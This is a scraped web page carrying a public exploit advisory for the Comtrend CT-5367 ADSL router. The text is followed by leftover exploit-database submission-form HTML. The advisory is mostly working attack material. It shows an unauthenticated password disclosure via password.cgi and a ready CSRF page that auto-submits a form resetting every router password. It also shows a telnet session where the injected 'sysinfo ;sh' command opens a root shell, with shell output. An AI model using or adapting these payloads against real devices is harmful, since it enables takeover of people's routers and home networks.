扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 |
/*COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12Remote Root ============================================================================= Board ID : 96338A-122 Software : A111-312BTC-C01_R12 Bootloader : 1.0.37-12.1-1 Wireless Driver : 4.170.16.0.cpe2.1sd ADSL : A2pB023k.d20k_rc2 ============================================================================= Type : HardWare Risk of use : High Type to use : Remote Discovered by : Todor Donev Author Email : todor.donev@gmail.com ============================================================================= Special greetz to my sweetheart friend and my lil' secret Tsvetelina Emirska, and all my other friends that support me a lot of times for everything !! */ root@linux:~#get.pl http://192.168.1.1/ /*HTTP/1.1 401 Unauthorized Cache-Control: no-cache Connection: close Date: Sat, 01 Jan 2000 00:04:31 GMT Server: micro_httpd## Yeah !! Bite me :( WWW-Authenticate: Basic realm="DSL Router" Content-Type: text/html <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD> <BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4> Authorization required. <HR> <ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS> </BODY></HTML> */ root@linux:~#get.pl http://192.168.1.1/password.cgi ## Information Disclosure /*HTTP/1.1 200 Ok Cache-Control: no-cache Connection: close Date: Mon, 03 Jan 2000 23:01:25 GMT Server: micro_httpd Content-Type: text/html <html> <head> <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'> <link rel="stylesheet" href='https://www.exploit-db.com/exploits/16275/stylemain.css' type='text/css'> <link rel="stylesheet" href='https://www.exploit-db.com/exploits/16275/colors.css' type='text/css'> <script language="javascript" src="https://www.exploit-db.com/exploits/16275/util.js"></script> <script language="javascript"> <!-- hide\n ## Dammit! =)) pwdAdmin = '<CENSORED>';## Censored Password pwdSupport = '<CENSORED>';## Censored Password pwdUser = '<CENSORED>';\n ## Censored Password */ [CUT EXPLOIT HERE]## CSRF For Change All passwords <html> <head></head> <title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title> <body onLoad=javascript:document.form.submit()> <form action="http://192.168.1.1/password.cgi"; method="POST" name="form"> <!-- Change default system Passwords to "shpek" without authentication and verification --> <input type="hidden" name="sptPassword" value="shpek"> <input type="hidden" name="usrPassword" value="shpek"> <input type="hidden" name="sysPassword" value="shpek"> </form> </body> </html> [CUT EXPLOIT HERE] root@linux:~# telnet 192.168.1.1 ADSL Router Model CT-5367 Sw.Ver. C01_R12 Login: root Password: ## BINGOO !! Godlike =)) > ? ? help logout reboot adsl atm ddns dumpcfg ping siproxd sntp sysinfo tftp wlan version build ipfilter > sysinfo Number of processes: 30 11:46pmup 2 days, 23:46, load average: 1 min:0.12, 5 min:0.05, 15 min:0.09 total used free sharedbuffers Mem:14012130289840588 Swap:000 Total:1401213028984 > sysinfo ;sh ## JAILBREAK !! FirmWare sucks:) Number of processes: 30 11:47pmup 2 days, 23:47, load average: 1 min:0.07, 5 min:0.05, 15 min:0.08 total used free sharedbuffers Mem:14012130249880588 Swap:000 Total:1401213024988 BusyBox v1.00 (2009.12.08-09:42+0000) Built-in shell (msh) Enter 'help' for a list of built-in commands. # cat /proc/version Linux version 2.6.8.1 (wander@localhost.localdomain) (gcc version 3.4.2) #1 Tue Dec 8 17:40:39 CST 2009 # ps PIDUid VmSize Stat Command 1 root280 S init 2 rootSWN [ksoftirqd/0] 3 rootSW< [events/0] 4 rootSW< [khelper] 5 rootSW< [kblockd/0] 15 rootSW[pdflush] 16 rootSW[pdflush] 17 rootSW[kswapd0] 18 rootSW< [aio/0] 23 rootSW[mtdblockd] 32 root328 S -sh 65 root 1384 S cfm 72 rootSW[bcmsw] 192 root216 S pvc2684d 275 root496 S nas -P /var/wl0nas.lan0.pid -H 34954 -l br0 -i wl0 -A 342 root304 S dhcpd 596 root 1384 S CT_Polling 600 root432 S pppd -c 0.0.35.1 -i nas_0_0_35 -u <CENSORED> -p 931 root248 S dhcpc -i nas_0_0_40 993 root316 S dproxy -D btc-adsl 997 root352 S upnp -L br0 -W ppp_0_0_35_1 -D 1013 root512 S siproxd --config /var/siproxd/siproxd.conf 1014 root512 S siproxd --config /var/siproxd/siproxd.conf 1015 root512 S siproxd --config /var/siproxd/siproxd.conf 10745 root292 S syslogd -C -l 7 10747 root256 S klogd 6616 root 1396 S telnetd 6618 root 1428 S telnetd 6673 root284 S sh -c sysinfo ;sh 6724 root284 R ps # top Mem: 13164K used, 848K free, 0K shrd, 588K buff, 5920K cached Load average: 0.00, 0.02, 0.07(State: S=sleeping R=running, W=waiting) PID USER STATUS RSSPPID %CPU %MEM COMMAND 6751 root R28866750.72.0 exe 2 root SWN0 10.30.0 ksoftirqd/0 6616 root S 1396650.19.9 telnetd 931 root S248 10.11.7 dhcpc 6618 root S 142866160.0 10.1 telnetd 65 root S 1384320.09.8 cfm 596 root S 1384650.09.8 CT_Polling 1013 root S512 10.03.6 siproxd 1014 root S51210130.03.6 siproxd 1015 root S51210140.03.6 siproxd 275 root S496 10.03.5 nas 600 root S432 10.03.0 pppd 997 root S352 10.02.5 upnp 32 root S328 10.02.3 sh 993 root S316 10.02.2 dproxy 6675 root S31666730.02.2 exe 342 root S304 10.02.1 dhcpd 10745 root S292 10.02.0 exe 6673 root S28466180.02.0 sh 1 root S280 00.01.9 init # echo * ## ls o.O?!? bin dev etc lib linuxrc mnt proc sbin usr var webs # </textarea> </li> <li id="text-cont_2"> <label for="extension">Text file extension:</label> <input type="text" name="extension" id="extension" value="txt" class="small" /> </li> <li id="attch_cont" style="display:none;"> <label for="attached_file">Attached file name:</label> <input type="text" name="file_path" id="attached_file" value="" class="large" /> </li> <li> <label for="application_link">Application link:</label> <input type="text" name="application_link" id="application_link" value="" class="large" /> </li> <li> <label for="application_version">Application version:</label> <input type="text" name="application_version" id="application_version" value="" class="large" /> </li> <li> <label for="application_file_name">Application file name:</label> <input type="text" name="application_path" id="application_file_name" value="" class="large" /> </li> <li> <label for="application_md5">Application file md5:</label> <input type="text" name="application_md5" id="application_md5" value="" class="large" /> </li> <li> <label for="cve">CVE code:</label> <input type="text" name="cve" id="cve" value="" class="small" /> </li> <li> <label for="osvdb">OSVDB code:</label> <input type="text" name="osvdb" id="osvdb" value="" class="small" /> </li> <li> <label for="import_as_gd">Add as google dork:</label> <input type="checkbox" name="import_as_gd" id="import_as_gd" value="1" onclick="toggleImportGDform();"/> <ul class="google-dork-import-form" style="display:none;"> <li> <label for="ghdb_status">Status:</label> <select name="ghdb_status" id="ghdb_status"> <option value="1" selected="selected">Active</option> <option value="0">Pending</option> </select> </li> <li> <label for="ghdb_cat_id">Category:</label> <select name="ghdb_cat_id" id="ghdb_cat_id"> <option value="0" selected="selected";>Select category</option> <option value="1">Footholds</option> <option value="2">Files containing usernames</option> <option value="3">Sensitive Directories</option> <option value="4">Web Server Detection</option> <option value="5">Vulnerable Files</option> <option value="6">Vulnerable Servers</option> <option value="7">Error Messages</option> <option value="8">Files containing juicy info</option> <option value="9">Files containing passwords</option> <option value="10">Sensitive Online Shopping Info</option> <option value="11">Network or vulnerability data</option> <option value="12">Pages containing login portals</option> <option value="13">Various Online Devices</option> <option value="14">Advisories and Vulnerabilities</option> </select> </li> <li> <label for="ghdb_title">Title:</label> <input type="text" name="ghdb_title" id="ghdb_title" value="" class="text" /> </li> <li> <label for="ghdb_text">Text:</label> <textarea name="ghdb_text" value="ghdb_text"> |
体验盒子
